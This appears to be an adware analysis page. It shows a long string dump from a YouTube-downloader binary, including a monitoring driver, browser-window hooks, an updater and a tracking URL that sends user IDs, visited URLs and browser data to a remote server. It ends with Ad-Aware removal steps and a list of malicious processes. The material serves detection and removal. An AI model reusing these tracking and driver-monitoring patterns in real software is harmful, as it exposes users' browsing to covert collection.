[CRtmpParser::ProcessData] Analyze Data: %d bytes

[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing

[CRtmpParser::OnHandshake] Step 4: Complete

[CRtmpParser::OnHandshake] Step 3: Complete

[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 2 - Server up time: %d

[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 1 - Client up time: %d

[CRtmpParser::OnHandshake] Protocol State: %d

[CRtmpParser::OnAudio]

[CRtmpParser::OnVideo]

[CRtmpParser::OnFLV]

[CRtmpParser::OnData]

[CRtmpParser::SetTimeStartPosition] Time: %d

[CRtmpParser::SetTimeEndPosition] Time: %d

[CRtmpParser::Close]

[CRtmpParser::OnError]

[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)

[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)

[CRtmpParser::Sync - %p]

[CRtmpParser::ParseFlvHeader]

[CRtmpParser::ParseData] Accumulated all %d/%d bytes

[CRtmpParser::ParseData] Chunk not ready

[CRtmpParser::ParseData] Going to append %d bytes

[CRtmpParser::ParseData] Got all %d/%d bytes

[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpParser::ParseData] ___Warning no data

[CRtmpParser::ParseData]

[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d

[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)

[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)

[CRtmpParser::ParseDataType] EOF Object (Offset: %d)

[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)

[CRtmpParser::ParseDataType] Object (Offset: %d)

[CRtmpParser::OnChangeChunkSize] %d -> %d

[CRtmpParser::OnChangeChunkSize]

[CRtmpParser::OnReadBytes] Bytes read: %d

[CRtmpParser::OnReadBytes]

[CRtmpParser::OnMetadata]

[CRtmpParser::Reset - %p]

[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type

[CRtmpParser::ReadObject] EOF Object (Offset: %d)

[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)

[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - NULL (Offset: %d)

[CRtmpParser::ReadObject] %s - Object (Offset: %d)

[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP

[CRtmpParser::ParseHandshakeHeader]

[CRtmpParser::ParseHeader] Absolute Time: %d

[CRtmpParser::ParseHeader] New Time: %d

[CRtmpParser::ParseHeader] New Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p

[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d

[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d

[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d

[CRtmpParser::ParseHeader]

[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes

[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)

[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes

[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!

[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!

[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...

[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes

[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)

[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...

[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes

[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...

[CRtmpParser::operator = %p] <= %p

[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...

[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d

[CRtmpParser::OnPing] SWFVerification

[CRtmpParser::OnPing] Time: %d

[CRtmpParser::OnPing] -- Unknown %d --

[CRtmpParser::OnPing] Stream buffer ready %d

[CRtmpParser::OnPing] Pause time: %d

[CRtmpParser::OnPing] Stream buffer empty %d

[CRtmpParser::OnPing] Pong %d

[CRtmpParser::OnPing] Stream is recorded %d

[CRtmpParser::OnPing] Ping %d

[CRtmpParser::OnPing] Stream dry %d

[CRtmpParser::OnPing] Stream EOF %d

[CRtmpParser::OnPing] Stream begin %d

[CRtmpParser::OnPing] Type: %d

[CRtmpParser::OnPing]

[CRtmpParser::OnServerBW] Server Bandwidth: %d

[CRtmpParser::OnServerBW]

[CRtmpParser::OnClientBW] Client Bandwidth: %d

[CRtmpParser::OnClientBW]

[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s

[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )

[CRtmpParser::OnInvoke] getStats

[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s

[CRtmpParser::OnInvoke] closeStream: StreamID = %g

[CRtmpParser::OnInvoke] deleteStream: StreamID = %g

[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s

[CRtmpParser::OnInvoke] startStream: PlayPath = %s

[CRtmpParser::OnInvoke] createStream: StreamID = %g

[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )

[CRtmpParser::OnInvoke] %s( '%s', '%s' )

[CRtmpParser::OnInvoke] seek( '%d' )

[CRtmpParser::OnInvoke] %s( '%d', '%g' )

[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d

[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s

[CRtmpParser::OnInvoke] _error - code: %s, level: %s

[CRtmpParser::OnInvoke] %s( '%s' )

[CRtmpParser::OnInvoke] _result createStream: StreamID = %g

[CRtmpParser::OnInvoke] _result connect - AMF3

[CRtmpParser::OnInvoke] _result connect: %s

[CRtmpParser::OnInvoke] _result for Method: %s

[CRtmpParser::OnInvoke] Method: %s

[CRtmpParser::OnInvoke]

Download Helper SendMsgToBtn, url: %s

Could not find converter registry key, %ws

Could not create process, error %x, proc %ws

RegContentType%d

RegRawData%d

RegProtocol%d

RegAgent%d

RegCookie%d

1.0.1.0

RegFileName%d

RegUrl

RegURL%d

%ws_%d.log

- Mozilla Firefox

- Windows Internet Explorer

opera

firefox

chrome

OPERA

opera.exe

safari.exe

firefox.exe

iexplore.exe

chrome.exe

explorer.exe

Google Chrome

Chrome_WidgetWin_1

Firefox

FirefoxBrowserWindow Found browser window, 0x%x

FirefoxBrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

OperaBrowserWindow Found button window, 0x%x

Opera

SafariBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

hXXp://VVV.youtube.com/watch?v=

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1

YTParser url not valid %ws

SBMonitor.log

Error no signature found at %s

GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.

GetVideoUrlAndSizeFromWatchPage

YTParser could not find valid url, not downloading

hXXp://VVV.youtube.com/get_video_info?video_id=

GetVideoUrlAndSizeFromVideoInfo

Failed processing urls from watch page.

reportLevel

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

(build %d)

Windows 2000

Windows XP

Web Edition

Windows Server 2003,

Windows XP Professional x64 Edition

Windows Home Server

Windows Storage Server 2003

Windows Server 2003 R2,

Web Server Edition

Windows Server 2008 R2

Windows 8

Windows 7

Windows Server 2008

Windows Vista

{X-hX-hX-XX-XXXXXX}

sbmntr.sys

Converter.exe

DownloadHelper.exe

HELPEREXELOCATION

YTDownloader.exe

MONITOREXELOCATION

hXXp://VVV.ytdownloader.com/feedback/

Driver - %ws: %x

\\.\SBMonitor

net.exe

Driver installed, NOT loaded: %s

Driver installed, loaded from %s

Software\Opera Software\

%programFiles%\Opera\opera.exe

Apple Application Support\WebKit2WebProcess.exe

Safari.exe

%programFiles%\Safari\Safari.exe

%programFiles%\Mozilla Firefox\firefox.exe

IEXPLORE.EXE

%programFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\

%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe

converter.exe

webm

[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).

Same as one of buttons PID %d

Same as our PID %d

[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).

___Error: Could not open device (%u).

-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http

CMonitor::BuildParams Already created similar url, %ws

CMonitor::BuildParams Button exists for similar url, %ws

youtube.com

-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http

-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s

Fwpuclnt.dll

https

Not application/octet-stream video and the size is bigger than %d, %d

Not application/octet-stream video and the size is smaller than %d

Not FLV video and the size is smaller than %d

vid2.ak.dmcdn.net

CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s

CHttpMonitor::SameYoutubeVideo Same watch page %s

HTTP_Version_String

[HttpParser::ParseLine] ___Error: The field separator was not found in the line:

VVV.google.com

Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}

YTD-icon-128x128.png

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s

hXXp://rep.ytdownloader.com/app/ping.ashx?

%s%s%s

[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d

[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d

rtmpdump.exe

[RtmpDownloader::ReadFromPipe] --- Download Ends ---

[RtmpDownloader::ReadFromPipe] --- Download Begins ---

[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d

Error : failed to run FFmpeg - %d

[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe

Failed to run update (%x).

Trying to execute an update.

CUpdater::parseUpdateXML Set report level to %ws

REPORT

CMDLINE

%sid=%d_r=%lld_err=%d

%suserid=%s&aff=%s&v=%s

hXXp://VVV.ytdownloader.com/app/update.ashx?

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

ADVAPI32.DLL

WUSER32.DLL

<>"#%{}|\^~[]`' ?&

%Program Files%\YTDownloader\YTDownloader.exe

1.0.3.9

YTDownloader.exe_2364_rwx_10000000_000E6000:

.text

`.rdata

@.data

.rsrc

@.reloc

</.uCU

FtPh8

u$D

<p.uH

FTPSW

The embedding BoxedApp into child processes: %s

GetCommandLineA preparing to intercept...done

GetCommandLineW preparing to intercept...done

The command line overriding: %s

Get old args...done

Get current dir...done

Get the extension...done

Get exe dir...done

Get exe dir...

550e832f-a497-4eb7-bb40-8cc856f6d152

BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath

, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory

, passed pBehavior doesn't support IVirtualFile

, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory

It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream

[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile

BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys

NtEnumerateKey() returned unexpected error, status =

, RegTree::IEnumKeyNode::GetNext() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys

, RegTree::IKeyNode::EnumKeys() failed, hr =

: IVirtualKeyHandle::CreateKey() failed, hr =

: RegTree::IEnumKeyNode::GetNext() failed, hr =

: GetAllChildsKeys() failed, status =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal

: RegTree::IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath

error, IVirtualKeyHandle_GetFullPath() returned

Invalid key information class:

KeySetHandleTagsInformation is not supported for virtual handle

KeySetDebugInformation is not supported for virtual handle

KeySetVirtualizationInformation is not supported for virtual handle

KeyControlFlagsInformation is not supported for virtual handle

KeyWow64FlagsInformation is not supported for virtual handle

We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles

We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles

: IVirtualKeyHandle::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal

: RegTree::IKeyNode::Rename() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey

: CRegistry::SetIsolationMode() failed for the hKey =

BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey

: result hkey =

: IVirtualKey::CreateKey() failed, hr =

: we can't create a virtual key with its own behavior under another virtual key

: Handles::CreateVirtualKeyHandle() failed, hr =

: IVirtualKey::OpenKey() failed, hr =

: GetFullRegKeyPath() failed for the hKey =

: Handles::IVirtualKeyHandle::CreateKey() failed and returned

: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key

BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper

: lpSubKey: "

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey

BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx

BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal

: SearchStartingFromRealKey() failed

: RegTree::IKeyNode::FindValue() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal

: IVirtualKeyHandle::put_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime

: NtQueryKey() failed, status =

: NtOpenKey() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys

: NtEnumerateValueKey() failed when we tried to get name of the node, status =

: IKeyNode::EnumValues() failed, hr =

: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =

: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal

BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal

: invalid KeyInformationClass passed:

: IVirtualKeyHandle_GetFullPath() failed, hr =

: Behavior::IEnumVirtualKey::GetNext() failed, hr =

: IVirtualKeyHandle::EnumValues() failed, hr =

: IVirtualKeyHandle::EnumKeys() failed, hr =

: IVirtualKeyHandle::get_LastWriteTime() failed, hr =

reg:NtQueryMultipleValueKey(

: IKeyNode::FindValue() failed, hr =

: IVirtualKeyHandle::get_Value() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal

: IVirtualKeyHandle::get_ValueType() failed, hr =

reg:NtSetInformationKey(

RegTree::IKeyNode::RemoveValue() failed, hr

BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal

reg:NtRenameKey(

reg:NtCreateKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView

RegTree::IEnumKeyNode::GetNext(), hr =

reg:NtDeleteValueKey(

: NtEnumerateKey() failed when we tried to get name of the node, status =

, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =

, Behavior::IVirtualKey::OpenKey() failed, hr =

: IKeyNode::EnumKeys() failed, hr =

BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal

reg:NtEnumerateValueKey(

reg:NtOpenKey(

reg:NtQueryKey(

reg:NtQueryValueKey(

reg:NtSetValueKey(

BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal

reg:NtEnumerateKey(

reg:NtDeleteKey(

TryCreateProcessForVirtualEXE, template exe found:

CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x

CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x

CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x

CBoxedAppCore::My_NtQueryKey, KeyHandle =

CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =

CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x

KernelBase.dll

kernel32.dll

0x%x%x

CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '

CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '

CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '

CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x

CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '

CBoxedAppCore::My_NtRenameKey, KeyHandle =

BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart

: Can't create process of rundll32.exe, last error =

VirtualDllWithSameImport.dll

BoxedAppSDK_RemoveExeFromAttachableChildProcListW

BoxedAppSDK_RemoveExeFromAttachableChildProcListA

BoxedAppSDK_AddExeToAttachableChildProcListW

BoxedAppSDK_AddExeToAttachableChildProcListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA

BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW

BoxedAppSDK_AddExeToAttachableChildProcExclusionListA

BoxedAppSDK_AddExeToAttachableChildProcExclusionListW

BoxedAppSDK_GetRegKeyIsolationModeA

BoxedAppSDK_GetRegKeyIsolationModeW

BoxedAppSDK_SetRegKeyIsolationModeA

BoxedAppSDK_SetRegKeyIsolationModeW

BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

BoxedAppSDK_AttachMixedBitnessProcessHelper

BoxedAppSDK_EnumVirtualRegKeysA

BoxedAppSDK_EnumVirtualRegKeysW

BoxedAppSDK_ExecuteDotNetApplicationA

BoxedAppSDK_ExecuteDotNetApplicationW

BoxedAppSDK_DeleteVirtualRegKeyByHandle

BoxedAppSDK_DeleteVirtualRegKeyW

BoxedAppSDK_DeleteVirtualRegKeyA

BoxedAppSDK_AddVirtualRegKeyW

BoxedAppSDK_AddVirtualRegKeyA

BoxedAppSDK_CreateVirtualRegKeyW

BoxedAppSDK_CreateVirtualRegKeyA

{4F95F74C-9713-4181-ACDD-8A50195FBC0F}

BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper

BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper

CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '

CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x

CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x

:\VirtualDllWithSameImport.dll

:\VirtualDllWithTls.dll

VirtualDllWithTls.dll

_CorExeMain

ole32.dll

WinExec

advapi32.dll

NtRenameKey

NtUnloadKey

NtSetValueKey

NtSetInformationKey

NtSaveKey

NtRestoreKey

NtReplaceKey

NtQueryValueKey

NtQueryMultipleValueKey

NtQueryKey

NtOpenKeyEx

NtOpenKey

NtNotifyChangeKey

NtLoadKey2

NtLoadKey

NtFlushKey

NtEnumerateValueKey

NtEnumerateKey

NtDeleteValueKey

NtDeleteKey

NtCreateKey

ntdll.dll

[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]

FILE_EXECUTE

GENERIC_EXECUTE

KEY_WOW64_64KEY

KEY_WOW64_32KEY

KEY_NOTIFY

KEY_CREATE_LINK

KEY_ENUMERATE_SUB_KEYS

KEY_CREATE_SUB_KEY

KEY_SET_VALUE

KEY_QUERY_VALUE

SECTION_MAP_EXECUTE

PAGE_EXECUTE_WRITECOPY

PAGE_EXECUTE_READWRITE

PAGE_EXECUTE_READ

PAGE_EXECUTE

STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED

STATUS_LOCAL_USER_SESSION_KEY

STATUS_NULL_LM_PASSWORD

STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE

STATUS_CARDBUS_NOT_SUPPORTED

STATUS_INVALID_PORT_ATTRIBUTES

STATUS_PORT_MESSAGE_TOO_LONG

STATUS_PORT_DISCONNECTED

STATUS_PORT_CONNECTION_REFUSED

STATUS_INVALID_PORT_HANDLE

STATUS_PORT_ALREADY_SET

STATUS_EAS_NOT_SUPPORTED

STATUS_CTL_FILE_NOT_SUPPORTED

STATUS_WRONG_PASSWORD

STATUS_ILL_FORMED_PASSWORD

STATUS_PASSWORD_RESTRICTION

STATUS_PASSWORD_EXPIRED

STATUS_FLOAT_DENORMAL_OPERAND

STATUS_FLOAT_INVALID_OPERATION

STATUS_PIPE_NOT_AVAILABLE

STATUS_INVALID_PIPE_STATE

STATUS_PIPE_BUSY

STATUS_PIPE_DISCONNECTED

STATUS_PIPE_CLOSING

STATUS_PIPE_CONNECTED

STATUS_PIPE_LISTENING

STATUS_NOT_SUPPORTED

STATUS_PIPE_EMPTY

STATUS_WRONG_PASSWORD_CORE

STATUS_PIPE_BROKEN

STATUS_DISK_OPERATION_FAILED

STATUS_KEY_DELETED

STATUS_KEY_HAS_CHILDREN

STATUS_NO_USER_SESSION_KEY

STATUS_PASSWORD_MUST_CHANGE

STATUS_PORT_UNREACHABLE

STATUS_LOGIN_TIME_RESTRICTION

STATUS_LOGIN_WKSTA_RESTRICTION

STATUS_UNSUPPORTED_COMPRESSION

STATUS_NO_USER_KEYS

STATUS_NOT_EXPORT_FORMAT

STATUS_TRANSPORT_FULL

STATUS_WMI_NOT_SUPPORTED

STATUS_SAM_NEED_BOOTKEY_PASSWORD

STATUS_SAM_NEED_BOOTKEY_FLOPPY

STATUS_STRONG_CRYPTO_NOT_SUPPORTED

STATUS_NOT_SUPPORTED_ON_SBS

STATUS_CSS_KEY_NOT_PRESENT

STATUS_CSS_KEY_NOT_ESTABLISHED

STATUS_NO_KERB_KEY

STATUS_UNSUPPORTED_PREAUTH

STATUS_PORT_NOT_SET

STATUS_INVALID_IMPORT_OF_NON_DLL

STATUS_SMARTCARD_NO_KEY_CONTAINER

STATUS_SMARTCARD_NO_CERTIFICATE

STATUS_SMARTCARD_NO_KEYSET

STATUS_SMARTCARD_CERT_REVOKED

STATUS_SMARTCARD_CERT_EXPIRED

STATUS_SXS_KEY_NOT_FOUND

STATUS_CLUSTER_JOIN_IN_PROGRESS

STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS

RegDeleteKeyExW

NtRequestWaitReplyPort

NtConnectPort

NtReplyPort

NtCompleteConnectPort

NtAcceptConnectPort

NtReplyWaitReceivePort

NtCreateWaitablePort

Imported function,

.data

.idata

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

USER32.dll

GDI32.dll

RegCloseKey

RegDeleteKeyW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyW

ADVAPI32.dll

OLEAUT32.dll

bxsdk32.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb

`.rsrc

v2.0.50727

BoxedAppSDK_AppDomainManager.dll

System.Security

.ctor

System.Security.Policy

System.Reflection

System.Runtime.InteropServices

System.Diagnostics

System.Runtime.CompilerServices

System.IO

DllImportAttribute

shell32.dll

lpCmdLine

System.Collections

System.Security.Permissions

1.0.0.0

$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78

I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb

mscoree.dll

BoxedAppSDKThunk.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb

.reloc

TLSSupport.dll

i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb

5"6.676@6|6

3O4L4T4]4

3(4,40444

11U1|1

>%>*>0>5>

2(4,40444

5f6D6e6

0=0"1.171@1`1

9%9u9~9

3 3-343;3

5o6L6T6]6

< ='=2=8=

;%;,;2;8;=;

: :4:8:<:@:

? ?$?(?,?0?4?8?<?

: :$:(:,:0:

GdiPlus.dll

HKEY_USERS

HKEY_CURRENT_CONFIG

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

%s\%s

:\tempManifest.manifest

%s\winsxs\tempBxDir\virtualAsm

BoxedAppVar:OldCmdLine

BoxedAppVar:ExeFullPath

BoxedAppVar:ExeFileNameWithoutExtension

BoxedAppVar:ExeFileExtension

BoxedAppVar:ExeFileName

BoxedAppLog_%d.txt

%s_%.8x

#SystemDrive#\#Windows#

#SystemDrive#\#Windows#\#System32#

\Device\NETBT_TCPIP_

\DosDevices\pipe\

\Device\NamedPipe\

\??\pipe\

publicKeyToken

Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\

.manifest

%s_%.8x_%.8x

.boxedapp_msg_process

boxedapp_event_newmsg

boxedapp_msg_global

bxsdk64.dll

:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\

\KernelBase.dll

\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll

%d-%d-%p

:\TLSSupport310D39B571B74d36B95451DD240D8758

",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper

\rundll32.exe"

DotNetAppDomainManager.CManagedHost

BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1

DotNetAppDomainManager.CAppDomainManager

>.config

",BoxedAppSDK_AttachMixedBitnessProcessHelper

Attempt to launch not executable file:

Unable to find appropriate template exe

comdlg32.dll

\dllhost.exe

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are 0, so this application is not a .net application; we are exiting now

nimage_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are not 0, so this application seems to be a .net application; we are executing mscoree.dll!_CorExeMain now

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].Size =

image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] =

image_nt_headers.OptionalHeader.AddressOfEntryPoint is NULL, let's check if this application is .net

hh.exe

find.exe

help.exe

winver.exe

regsvr32.exe

dllhost.exe

ntvdm.exe

tcpsvcs.exe

mpr.dll

sxs.dll

Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html

%s_%.8x_%.8x_%.8x

.config

3, 3, 5, 12

BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Softanics

BoxedAppSDK.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

BrowserHelper.exe:3852
net1.exe:308
net1.exe:3640
Xfunhej.exe:3632
ping.exe:2088
ping.exe:2548
ping.exe:2312
ping.exe:3196
ping.exe:3620
ping.exe:4068
ping.exe:4076
ping.exe:968
ping.exe:2700
ping.exe:3684
ping.exe:3400
ping.exe:3524
ping.exe:2704
ping.exe:2300
ping.exe:2972
ping.exe:3148
ping.exe:2236
ping.exe:2976
ns19.tmp:2004
8e4b80.exe:3080
ins_sense.exe:2532
Rpuxtvuh.exe:3544
find.exe:2064
sc.exe:3412
sc.exe:3732
sc.exe:4016
net.exe:4004
net.exe:3552
setup.exe:2172
setup.exe:3240
tcpsvcs.exe:2420
ins_geforce.exe:2480
ShopperPro.exe:2216
ins_shopperpro.exe:2144
regsvr32.exe:2320
BROWSE~2.EXE:3752
%original file name%.exe:344
